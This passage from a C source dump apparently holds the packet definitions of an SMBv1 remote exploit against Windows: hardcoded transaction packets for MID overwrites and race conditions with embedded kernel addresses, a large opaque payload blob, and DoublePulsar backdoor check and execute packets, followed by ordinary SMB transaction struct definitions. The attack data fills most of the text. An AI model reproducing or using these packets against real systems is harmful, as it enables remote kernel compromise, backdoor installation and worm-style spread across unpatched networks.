220 | "\x6a\x34\x01\x6c\x3f\x63\x1a\x28\x1d\x2d\xc6\x5e\xb2\x0a\x9e\xcf" \
221 | "\xab\xa1\x14\x69\xe9\xda\x61\x27\xf9\xff\x47\x77\x14\x71\x06\xe2" \
222 | "\x33\x00\x80\x4e\x72\x63\xe8\x9c\x62\xe6\xdd\xdb\x72\xca\x6d\xf8" \
223 | "\x1f\x62\xd7\x14\xfe\x7b\x74\x57\x6a\x11\xc0\x89\xd9\xd5\xd9\x30" \
224 | "\x9e\x9d\x61\x87\x2b\x2f\x2e\x0a\x88\x81\xb2\xe6\x22\xee\x7d\x15" \
225 | "\x98\x68\xbf\x6d\xb6\x33\x3e\x63\x39\x2d\x9d\xdd\x92\x2d\x5e\xc1" \
226 | "\x46\x7e\x8b\x9e\x16\x08\x6e\x30\x9c\x1c\x31\x01\x7c\x81\xf0\xfc" \
227 | "\xd5\xbb\xf9\x2d\x20\x17\xc6\x7b\x17\x87\x8b\xa9\xe0\xd7\xba\x5e" \
228 | "\x0b\x3e\x71\x81\xa5\xd4\x31\xb0\xf2\xfa\xcd\x14\x07\x34\xf2\x6c" \
229 | "\xdd\x89\x38\x79\x12\xe0\x19\xb7\xfc\x75\xc1\x89\x2b\xd9\x1e\xb9" \
230 | "\x18\xa0\x09\x89\x13\x24\x08\x17\x26\x88\x7e\x72\x0f\x61\xb6\x09" \
231 | "\xfc\x28\xb9\xdb\x2c\xf4\x4b\x17\x27\x78\xfe\x82\xa4\xe0\xc1\x6d" \
232 | "\xde\x8d\xd5\x73\x62\x2f\x8e\xda\x1a\x5b\xc8\xd2\xa8\x08\x77\x63" \
233 | "\xc8\x18\x41\x47\xd4\x5e\x7c\x83\x20\x39\x88\x02\x45\x42\xe2\xfb" \
234 | "\x18\x18\xdc\x67\x5f\xd4\x62\x53\xfc\x2f\xb4\x56\xb1\xd4\x79\xf0" \
235 | "\x20\xfe\x1b\x17\x3a\xd1\xcf\xcb\xb7\x89\x2c\xdd\xce\xfc\xc8\xcd" \
236 | "\xc7\x7c\xaf\xf4\x9b\x9c\x2f\xc8\x3f\xe8\xd6\x88\xcc\x16\x07\x0d" \
237 | "\x29\xa9\x1d\x0f\x53\xa8\x72\xa7\x04\x60\x42\x51\xc8\xb5\xc2\x36"
238 |
239 | #define WRITE_ANDX_INDATA_SHIFT_PACKET_SIZE 576
240 |
241 |
242 | #define TRANS_SECONDARY_MID_OVERWRITE_PACKET "\x00\x00\x00\x44\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
243 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28" \
244 | "\x00\x08\x00\x40\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
245 | "\x00\x42\x00\x30\x53\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
246 | "\x00\x00\x00\x00\x00\x00\x00\x00"
247 |
248 | #define TRANS_SECONDARY_MID_OVERWRITE_PACKET_SIZE 72
249 |
250 |
251 | #define TRANS_SECONDARY_FIRST_MID_ZERO_PACKET "\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
252 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
253 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
254 | "\x00\x42\x00\xff\xff\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
255 | "\x00\x00\x00\x00\x00\x00\x00"
256 |
257 | #define TRANS_SECONDARY_FIRST_MID_ZERO_PACKET_SIZE 71
258 |
259 | #define TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET "\x00\x00\x00\x4a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
260 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28" \
261 | "\x00\x08\x00\x40\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" \
262 | "\x00\x42\x00\xf0\x52\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
263 | "\x00\x00\x00\x00\x00\x00\xa4\xe8\x32\x33\x80\xfa\xff\xff"
264 |
265 | #define TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET_SIZE 78
266 |
267 | #define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
268 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
269 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
270 | "\x00\x42\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
271 | "\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x46\xff\x53" \
272 | "\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
273 | "\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28\x00\x08\x00\x40\x08\x00" \
274 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x42\x00\x18\x53\x13" \
275 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
276 | "\x00\x10\x00\x00\x00\x00\x00\x4a\xff\x53\x4d\x42\x26\x00\x00\x00" \
277 | "\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
278 | "\x00\x08\x0b\x28\x00\x08\x00\x40\x08\x00\x00\x00\x00\x00\x00\x00" \
279 | "\x00\x00\x00\x08\x00\x42\x00\xf0\x52\x17\x00\x00\x00\x00\x00\x00" \
280 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xf5\x62\x06\xa0\xf8" \
281 | "\xff\xff\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18" \
282 | "\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" \
283 | "\x0c\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
284 | "\x00\x28\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00" \
285 | "\x00\x00\x00\x00\x00\x00\x00\x00\x60\xe5\x07\x35\x80\xfa\xff\xff" \
286 | "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
287 | "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" \
288 | "\x00\x00\x00\x4a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
289 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
290 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" \
291 | "\x00\x42\x00\x60\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
292 | "\x00\x00\x00\x00\x00\x00\xd4\xf5\x62\x06\xa0\xf8\xff\xff\x00\x00" \
293 | "\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
294 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
295 | "\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42" \
296 | "\x00\xb5\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
297 | "\x00\x00\x00\x00\x01\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00" \
298 | "\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
299 | "\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00" \
300 | "\x00\x00\x00\x00\x04\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00" \
301 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00" \
302 | "\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00" \
303 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00" \
304 | "\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" \
305 | "\x42\x00\xe1\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
306 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x42\xff\x53\x4d\x42\x26\x00" \
307 | "\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
308 | "\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00\x00\x00" \
309 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00" \
310 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
311 |
312 | #define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET_SIZE 700
313 |
314 | #define TRANS_SECONDARY_SECOND_MID_ZERO_PACKET "\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
315 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
316 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28" \
317 | "\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
318 | "\x00\x00\x00\x00\x00\x00\x50\xd2\x68\x06\x80\xf8\xff\xff\x04\x00" \
319 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00" \
320 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"
321 |
322 | #define TRANS_SECONDARY_SECOND_MID_ZERO_PACKET_SIZE 110
323 |
324 |
325 | #define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
326 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
327 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
328 | "\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
329 | "\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00\x00\x00\x43\xff\x53" \
330 | "\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
331 | "\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00" \
332 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42\x00\xe3\x00\x10" \
333 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
334 | "\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07" \
335 | "\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c" \
336 | "\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
337 | "\x01\x00\x42\x00\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
338 | "\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x42\xff\x53\x4d\x42" \
339 | "\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00" \
340 | "\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00" \
341 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00" \
342 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
343 |
344 |
345 | #define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE 286
346 |
347 | #define TRANS_SECONDARY_THIRD_MID_ZERO_PACKET "\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
348 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
349 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28" \
350 | "\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
351 | "\x00\x00\x00\x00\x00\x00\x50\xd4\x68\x06\x80\xf8\xff\xff\x04\x00" \
352 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00" \
353 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"
354 |
355 | #define TRANS_SECONDARY_THIRD_MID_ZERO_PACKET_SIZE 110
356 |
357 | #define TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
358 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
359 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
360 | "\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
361 | "\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00\x00\x00\x43\xff\x53" \
362 | "\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
363 | "\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00" \
364 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42\x00\xe3\x00\x10" \
365 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
366 | "\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07" \
367 | "\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c" \
368 | "\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
369 | "\x01\x00\x42\x00\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
370 | "\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x42\xff\x53\x4d\x42" \
371 | "\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00" \
372 | "\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00" \
373 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00" \
374 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
375 |
376 | #define TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE 286
377 |
378 |
379 | #define TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET "\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
380 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
381 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28" \
382 | "\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
383 | "\x00\x00\x00\x00\x00\x00\x50\xd6\x68\x06\x80\xf8\xff\xff\x04\x00" \
384 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00" \
385 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"
386 |
387 | #define TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET_SIZE 110
388 |
389 |
390 | #define TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
391 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
392 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
393 | "\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
394 | "\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00\x00\x00\x43\xff\x53" \
395 | "\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
396 | "\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00" \
397 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42\x00\xe3\x00\x10" \
398 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
399 | "\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07" \
400 | "\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c" \
401 | "\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
402 | "\x01\x00\x42\x00\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
403 | "\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x42\xff\x53\x4d\x42" \
404 | "\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00" \
405 | "\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00" \
406 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00" \
407 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
408 |
409 | #define TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE 286
410 |
411 |
412 | #define SECOND_NT_CREATE_ANDX_PACKET "\x00\x00\x00\x62\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc0" \
413 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
414 | "\x00\x08\x80\x00\x18\xff\x00\x62\x00\x00\x0c\x00\x16\x00\x00\x00" \
415 | "\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
416 | "\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" \
417 | "\x02\x00\x00\x00\x03\x0f\x00\x00\x6c\x00\x73\x00\x61\x00\x72\x00" \
418 | "\x70\x00\x63\x00\x00\x00"
419 |
420 | #define SECOND_NT_CREATE_ANDX_PACKET_SIZE 102
421 |
422 | #define TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET "\x00\x00\x00\x62\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
423 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
424 | "\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20" \
425 | "\x00\x42\x00\x90\x00\x2f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
426 | "\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
427 | "\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
428 | "\x00\x00\x00\x01\x00\x00"
429 |
430 | #define TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET_SIZE 102
431 |
432 |
433 |
434 |
435 |
436 | /*
437 | *
438 | *
439 | * DoublePulsar Packet Strings
440 | *
441 | *
442 | */
443 |
444 | #define DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET "\x00\x00\x00\x4e\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x18\x07\xc0" \
445 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
446 | "\x00\x08\x41\x00\x0f\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00" \
447 | "\x00\x77\xbf\xed\x00\x00\x00\x0c\x00\x42\x00\x00\x00\x4e\x00\x01" \
448 | "\x00\x0e\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
449 | "\x00\x00"
450 |
451 | #define DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET_SIZE 82
452 |
453 | #define DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET \
454 | "\x00\x00\x10\x4e\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x18\x07\xc0" \
455 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
456 | "\x00\x08\x42\x00\x0f\x0c\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00" \
457 | "\x00\x66\xb8\xaa\x00\x00\x00\x0c\x00\x42\x00\x00\x10\x4e\x00\x01" \
458 | "\x00\x0e\x00\x0d\x10\x00\xce\x75\x60\x63\xce\x27\x60\x63\xce\x37" \
459 | "\x60\x63"
460 |
461 | #define DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET_SIZE 82
462 |
463 |
464 |
465 |
466 | #define DOUBLE_PULSAR_TREE_DISCONNECT_PACKET "\x00\x00\x00\x23\xff\x53\x4d\x42\x71\x00\x00\x00\x00\x18\x07\xc0" \
467 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
468 | "\x00\x08\x41\x00\x00\x00\x00"
469 |
470 | #define DOUBLE_PULSAR_TREE_DISCONNECT_PACKET_SIZE 39
471 |
472 |
473 | #define DOUBLE_PULSAR_LOGOFF_ANDX_PACKET "\x00\x00\x00\x27\xff\x53\x4d\x42\x74\x00\x00\x00\x00\x18\x07\xc0" \
474 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
475 | "\x00\x08\x41\x00\x02\xff\x00\x27\x00\x00\x00"
476 |
477 | #define DOUBLE_PULSAR_LOGOFF_ANDX_PACKET_SIZE 43
478 |
479 |
480 |
481 |
482 |
483 | #define EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET "\x00\x00\x00\x4b\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x45\x68" \
484 | "\x00\x00\xb9\x10\x4f\xef\x85\x1a\xb6\x20\x00\x00\x00\x08\x09\x5a" \
485 | "\x02\x08\x01\x00\x10\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00" \
486 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x4a\x00\x02" \
487 | "\x00\x23\x00\x00\x00\x07\x00\x5c\x50\x49\x50\x45\x5c\x00\x00"
488 |
489 |
490 | #define EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET_SIZE 79
491 |
--------------------------------------------------------------------------------
/smbtransaction.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #pragma once
3 | #include "smbmacros.h"
4 |
5 | #pragma pack(push, 1)
6 |
7 | typedef struct _REQ_TRANSACTION {
8 | BYTE WordCount;
9 | WORD TotalParameterCount;
10 | WORD TotalDataCount;
11 | WORD MaxParameterCount;
12 | WORD MaxDataCount;
13 | BYTE MaxSetupCount;
14 | BYTE Reserved;
15 | WORD Flags;
16 | DWORD Timeout;
17 | WORD Reserved2;
18 | WORD ParameterCount;
19 | WORD ParameterOffset;
20 | WORD DataCount;
21 | WORD DataOffset;
22 | BYTE SetupCount;
23 | BYTE Reserved3;
24 | BYTE Buffer[1];
25 | //USHORT Setup[]; // Setup words (# = SetupWordCount)
26 | //USHORT ByteCount; // Count of data bytes
27 | //UCHAR Name[]; // Name of transaction (NULL if Transact2)
28 | //UCHAR Pad[]; // Pad to SHORT or LONG
29 | //UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
30 | //UCHAR Pad1[]; // Pad to SHORT or LONG
31 | //UCHAR Data[]; // Data bytes (# = DataCount)
32 | }REQ_TRANSACTION, * PREQ_TRANSACTION;
33 |
34 | typedef struct _REQ_NT_TRANSACTION {
35 | BYTE WordCount;
36 | BYTE MaxSetupCount;
37 | WORD Flags;
38 | DWORD TotalParameterCount;
39 | DWORD TotalDataCount;
40 | DWORD MaxParameterCount;
41 | DWORD MaxDataCount;
42 | DWORD ParameterCount;
43 | DWORD ParameterOffset;
44 | DWORD DataCount;
45 | DWORD DataOffset;
46 | BYTE SetupCount;
47 | WORD Function;
48 | WORD ByteCount;
49 | BYTE Buffer[1];
50 | //USHORT Setup[]; // Setup words (# = SetupWordCount)
51 | //USHORT ByteCount; // Count of data bytes
52 | //UCHAR Pad1[]; // Pad to LONG
53 | //UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
54 | //UCHAR Pad2[]; // Pad to LONG
55 | //UCHAR Data[]; // Data bytes (# = DataCount)
56 | }REQ_NT_TRANSACTION, * PREQ_NT_TRANSACTION;
57 |
58 | typedef struct _RESP_NT_TRANSACTION_INTERIM {
59 | BYTE WordCount;
60 | WORD ByteCount;
61 | BYTE Buffer[1];
62 | }RESP_NT_TRANSACTION_INTERIM, * PRESP_NT_TRANSACTION_INTERIM;
63 |
64 | typedef struct _RESP_NT_TRANSACTION {
65 | BYTE WordCount; // Count of data bytes; value = 18 + SetupCount
66 | BYTE Reserved1;
67 | WORD Reserved2;
68 | DWORD TotalParameterCount;
69 | DWORD TotalDataCount;
70 | DWORD ParameterCount;
71 | DWORD ParameterOffset;
72 | DWORD ParameterDisplacement;
73 | DWORD DataCount;
74 | DWORD DataOffset;
75 | DWORD DataDisplacement;
76 | BYTE SetupCount;
77 | BYTE Buffer[1];
78 | //USHORT Setup[]; // Setup words (# = SetupWordCount)
79 | //USHORT ByteCount; // Count of data bytes
80 | //UCHAR Pad1[]; // Pad to LONG
81 | //UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
82 | //UCHAR Pad2[]; // Pad to SHORT or LONG
83 | //UCHAR Data[]; // Data bytes (# = DataCount)
84 | }RESP_NT_TRANSACTION, * PRESP_NT_TRANSACTION;
85 |
86 | typedef struct _REQ_NT_TRANSACTION_SECONDARY {
87 | BYTE WordCount;
88 | BYTE Reserved1;
89 | WORD Reserved2;
90 | DWORD TotalParameterCount;
91 | DWORD TotalDataCount;
92 | DWORD ParameterCount;
93 | DWORD ParameterOffset;
94 | DWORD ParameterDisplacement;
95 | DWORD DataCount;
96 | DWORD DataOffset;
97 | DWORD DataDisplacement;
98 | BYTE Reserved3;
99 | WORD ByteCount;
100 | BYTE Buffer[1];
101 | //UCHAR Pad1[]; // Pad to LONG
102 | //UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
103 | //UCHAR Pad2[]; // Pad to LONG
104 | //UCHAR Data[]; // Data bytes (# = DataCount)
105 | }REQ_NT_TRANSACTION_SECONDARY, * PREQ_NT_TRANSACTION_SECONDARY;
106 |
107 | /*typedef struct REQ_TRANSACTION2{
108 | BYTE WordCount;
109 | //words:
110 | WORD TotalParameterCount;
111 | WORD TotalDataCount;
112 | WORD MaxParameterCount;
113 | WORD MaxDataCount;
114 | BYTE MaxSetupCount;
115 | BYTE Reserved1;
116 | WORD Flags;
117 | DWORD Timeout;
118 | WORD Reserved2;
119 | WORD ParameterCount;
120 | WORD ParameterOffset;
121 | WORD DataCount;
122 | WORD DataOffset;
123 | BYTE SetupCount;
124 | BYTE Reserved3;
125 | //USHORT Setup[SetupCount];
126 | //smb Data:
127 | BYTE Bytes[1];
128 | }*PREQ_TRANSACTION2;
129 | */
130 | typedef struct _RESP_TRANSACTION_INTERIM {
131 | BYTE WordCount;
132 | WORD ByteCount;
133 | BYTE Buffer[1];
134 | }RESP_TRANSACTION_INTERIM, * PRESP_TRANSACTION_INTERIM;
135 |
136 | typedef struct _RESP_TRANSACTION {
137 | BYTE WordCount;
138 | WORD TotalParameterCount;
139 | WORD TotalDataCount;
140 | WORD Reserved;
141 | WORD ParameterCount;
142 | WORD ParameterOffset;
143 | WORD ParameterDisplacement;
144 | WORD DataCount;
145 | WORD DataOffset;
146 | WORD DataDisplacement;
147 | BYTE SetupCount;
148 | BYTE Reserved2;
149 | BYTE Buffer[1];
150 | }RESP_TRANSACTION, * PRESP_TRANSACTION;
151 |
152 | typedef struct _REQ_TRANSACTION_SECONDARY {
153 | BYTE WordCount;
154 | WORD TotalParameterCount;
155 | WORD TotalDataCount;
156 | WORD ParameterCount;
157 | WORD ParameterOffset;
158 | WORD ParameterDisplacement;
159 | WORD DataCount;
160 | WORD DataOffset;
